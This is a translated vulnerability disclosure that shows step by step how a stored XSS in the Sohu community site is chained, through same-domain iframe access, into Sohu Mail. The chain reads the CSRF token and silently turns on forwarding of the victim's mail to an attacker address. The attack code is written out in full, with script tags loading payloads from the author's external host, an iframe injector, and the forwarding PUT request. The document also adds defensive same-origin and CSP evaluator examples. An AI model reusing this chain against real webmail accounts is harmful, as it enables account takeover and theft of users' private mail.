Use Sohu mailbox XSS to hijack user mail
1. This vulnerability exploits the contentWindow function.
2. This function allows the parent window to obtain the content of a child window, provided that the child window's content is in the same domain. For example, I can obtain the content of Sohu Mail from the Sohu community.
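The same-domain condition in step 2 is the browser's same-origin rule for frame access. As an added example that is not part of the report, the following JavaScript models that rule: a parent page may read `frame.contentWindow.document` only when scheme, host and port all match, or when both documents have opted in through the legacy `document.domain` setter with the same value. The hostnames under `example.test`, and the function names, are constructed for illustration; it runs under Node, which provides the `URL` class.

```javascript
// Added example (not part of the original report): a model of the check the
// browser applies before a parent page may read frame.contentWindow.document.
// Hostnames under example.test are constructed for illustration.

function defaultPort(protocol) {
  return { "http:": "80", "https:": "443" }[protocol] || "";
}

function originOf(url) {
  const u = new URL(url);
  return {
    scheme: u.protocol,
    host: u.hostname.toLowerCase(),
    port: u.port || defaultPort(u.protocol),
  };
}

// Plain same-origin test: scheme, host and port must all be identical.
function sameOrigin(a, b) {
  const x = originOf(a), y = originOf(b);
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// document.domain may only be set to the host itself or to a parent domain
// of it; the browser throws on anything else. Mirror that rule here.
function validDomainSetting(host, domain) {
  if (!domain) return true;
  domain = domain.toLowerCase();
  return host === domain || host.endsWith("." + domain);
}

// Can a script in parentUrl read the DOM of a frame showing frameUrl?
// parentDomain / frameDomain are the values each page assigned to
// document.domain (null when it was never set).
function canReadFrameDocument(parentUrl, frameUrl, parentDomain = null, frameDomain = null) {
  const p = originOf(parentUrl), f = originOf(frameUrl);
  // An assignment the browser would have rejected leaves that page at its plain origin.
  if (!validDomainSetting(p.host, parentDomain)) parentDomain = null;
  if (!validDomainSetting(f.host, frameDomain)) frameDomain = null;
  // Legacy relaxation: both documents set document.domain to the same value.
  // The HTML spec's "same origin-domain" comparison then ignores the port.
  if (parentDomain && frameDomain) {
    return p.scheme === f.scheme && parentDomain.toLowerCase() === frameDomain.toLowerCase();
  }
  // If only one side set document.domain, the two documents no longer match at all.
  if (parentDomain || frameDomain) return false;
  return sameOrigin(parentUrl, frameUrl);
}
```

The practical consequence for a defender is that every host allowed to relax `document.domain` to the shared parent, and every host that is literally the same origin, can read the mail application's DOM from an iframe; a community site that accepts user-supplied script must be kept out of that set.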
3. The next step needs no explanation: I just need an XSS in the Sohu community, and from there I can go straight at the Sohu mailbox. I found a previously submitted XSS; since it hasn't been fixed, I will use it:
WooYun: Dom xss in Sohu community. You can modify the title and content of a user post (xss filter bypass)
4. I will not elaborate on the XSS; see the link above. I inserted the XSS code in the signature field of the Sohu community:
<Script pre="" src="http://q601333824.sinaapp.com/xss1.js">
<script src="http://q601333824.sinaapp.com/xss1.js"
------------------------------------------------------------------------------------------
5. Now that I know this problem exists, how can I hijack the user's mail? Through the automatic mail forwarding function.
6. The automatic forwarding function is protected by a csrf-token, but the csrf-token is stored in the web page. Now that XSS runs in Sohu mail, the csrf-token can be read:
①. It is displayed in the page source.
②. I obtained the csrf-token of the Sohu mailbox directly from the Sohu community.
------------------------------------------------------------------------------
6. The next step is to simulate the POST submission. You can use $.ajax with a custom request header to submit the csrf-token, but Sohu mail does not seem to support $.ajax; the console reports that the method cannot be found because the jQuery library is not loaded.
7. So we can load a jQuery library ourselves (here I use the jQuery library hosted by the w3school tutorial site).
8. So the final code has two sections. The first section:
① The first section loads the jQuery library so that the Sohu mailbox can support ajax, and then injects the XSS code into the Sohu mailbox in the child window:
var t = document.createElement("iframe");   // frame the mailbox inside the community page
t.setAttribute("src", "http://mail.sohu.com/");
t.height = "700";
t.width = "700";
t.id = "xss123";
document.body.appendChild(t);
function aaa() {
    var ccc = document.getElementById("xss123").contentWindow;   // same-domain frame, so its document is readable
    var k = ccc.document.createElement("script");                // load jQuery into the mailbox document
    k.setAttribute("src", "http://www.w3school.com.cn/jquery/jquery.js");
    ccc.document.body.appendChild(k);
    var b = ccc.document.createElement("script");                // then the second section (xss2.js)
    b.setAttribute("src", "http://q601333824.sinaapp.com/xss2.js");
    ccc.document.body.appendChild(b);
}
setTimeout(aaa, 3000);   // wait for the mailbox frame to finish loading
②. The second section of the code: the automatic forwarding settings seem to be submitted with PUT, so the code captures the mailbox's csrf-token and submits the PUT:
var token = document.getElementById("csrf-token").content;   // get the csrf-token
var url = location.href;                                       // get the user's url, which differs per user
var url2 = url.replace("main", "profile");                     // replace it with the submit address
$.ajax({
    url: url2,
    data: {"autoreplyenable": "false", "startyear": "2015", "startmonth": "5", "startmonth": "5", "forwardenable": "true", "forward": "[email protected]", "_method": "put"},   // "forward" is the address mail is forwarded to
    type: "PUT",
    beforeSend: function (xhr) { xhr.setRequestHeader("X-CSRF-Token", token); },
    success: function (data) {
        alert(data);
    }
});
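From a defender's view, the chain in steps 6 to 8 depends on two things: the mailbox page can be framed by another page, and the mailbox page executes scripts fetched from arbitrary hosts. As an added example that is neither Sohu's configuration nor the report's code, the following JavaScript evaluates a Content-Security-Policy header against those two events: `script-src` decides which script URLs a page may load, and `frame-ancestors` decides which pages may embed it. The policy string, the `static.mail.example` host and the `community.example.test` parent page are constructed; the page URL and the two script hosts are the ones the report names. Matching follows the CSP host-source rules (scheme, exact or wildcard host, port, optional path prefix) closely enough for these cases.

```javascript
// Added example (not part of the original report): a small evaluator for the
// two Content-Security-Policy directives that bear on this report.
// The policy, static.mail.example and community.example.test are constructed.

function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

function defaultPort(protocol) {
  return { "http:": "80", "https:": "443" }[protocol] || "";
}

// Does one source expression ('self', https://cdn.example, *.example.org, ...)
// match url, evaluated from the page at pageUrl?
function sourceMatches(expr, url, pageUrl) {
  const u = new URL(url), page = new URL(pageUrl);
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === "'self'") return u.origin === page.origin;
  if (e === "*") return /^https?:$/.test(u.protocol);   // '*' never matches data: and friends
  if (e.startsWith("'")) return false;                  // other keywords are not host sources
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return u.protocol === e;   // scheme-source such as "https:"
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?(\/.*)?$/.exec(e);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  // scheme: an explicit one must match; an implicit one takes the page's scheme (https also passes)
  if (scheme) { if (u.protocol !== scheme + ":") return false; }
  else if (u.protocol !== page.protocol && u.protocol !== "https:") return false;
  // host: "*.example.com" matches any subdomain, otherwise exact
  const h = u.hostname.toLowerCase();
  if (host.startsWith("*.")) { if (!h.endsWith(host.slice(1))) return false; }
  else if (h !== host) return false;
  // port: an explicit one must match (or be '*'); absent means the scheme's default
  const up = u.port || defaultPort(u.protocol);
  if (port) { if (port !== "*" && port !== up) return false; }
  else if (up !== defaultPort(u.protocol)) return false;
  // path: prefix match when it ends in '/', exact otherwise
  if (path) {
    if (path.endsWith("/")) { if (!u.pathname.startsWith(path)) return false; }
    else if (u.pathname !== path) return false;
  }
  return true;
}

function directiveFor(policy, name) {
  // script-src falls back to default-src; frame-ancestors deliberately does not
  if (policy[name]) return policy[name];
  return name === "frame-ancestors" ? null : policy["default-src"] || null;
}

// May the page at pageUrl load scriptUrl under this policy?
function scriptAllowed(policy, scriptUrl, pageUrl) {
  const list = directiveFor(policy, "script-src");
  if (!list) return true;   // no applicable directive means no restriction
  return list.some(expr => sourceMatches(expr, scriptUrl, pageUrl));
}

// May a document at parentUrl embed the page at pageUrl in a frame?
function frameAllowed(policy, parentUrl, pageUrl) {
  const list = directiveFor(policy, "frame-ancestors");
  if (!list) return true;
  return list.some(expr => sourceMatches(expr, parentUrl, pageUrl));
}

// Constructed policy for a mail site: scripts only from its own origin or one
// static host, and no framing at all.
const MAIL_PAGE = "http://mail.sohu.com/main";
const EXAMPLE_POLICY = parseCsp(
  "default-src 'none'; script-src 'self' https://static.mail.example; frame-ancestors 'none'"
);

function demo() {
  return {
    jqueryFromW3school: scriptAllowed(EXAMPLE_POLICY, "http://www.w3school.com.cn/jquery/jquery.js", MAIL_PAGE),
    xss2: scriptAllowed(EXAMPLE_POLICY, "http://q601333824.sinaapp.com/xss2.js", MAIL_PAGE),
    ownScript: scriptAllowed(EXAMPLE_POLICY, "http://mail.sohu.com/js/app.js", MAIL_PAGE),
    staticHost: scriptAllowed(EXAMPLE_POLICY, "https://static.mail.example/lib.js", MAIL_PAGE),
    framedByCommunity: frameAllowed(EXAMPLE_POLICY, "http://community.example.test/post/1", MAIL_PAGE),
  };
}
```

Under a policy like this the browser would refuse both script loads from section ① and would not let the community page frame the mailbox at all, which breaks the chain in two independent places. CSP limits what an injected script can load and where the page can be embedded; it does not remove the XSS itself, and a token stored in the DOM remains readable by any script that does run there.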
-------------------------------------------------------------------------------------------
9. Test (the XSS can be triggered in a post; see the XSS vulnerability link above for details)
① First the jQuery library is loaded, then the xss2 script, then the PUT is submitted and the forwarding mail settings are modified.
②.
③.
----------------------------------------------------------------------------------
10. The result: the forwarding settings of Sohu mail are changed to [email protected].
Proof of vulnerability:
1. See the vulnerability proof above.
Solution:
1. Do not assume that fixing the XSS will be enough. That can only be a temporary solution, because a site this large has many XSS (=_=)
2. You know this better than I do.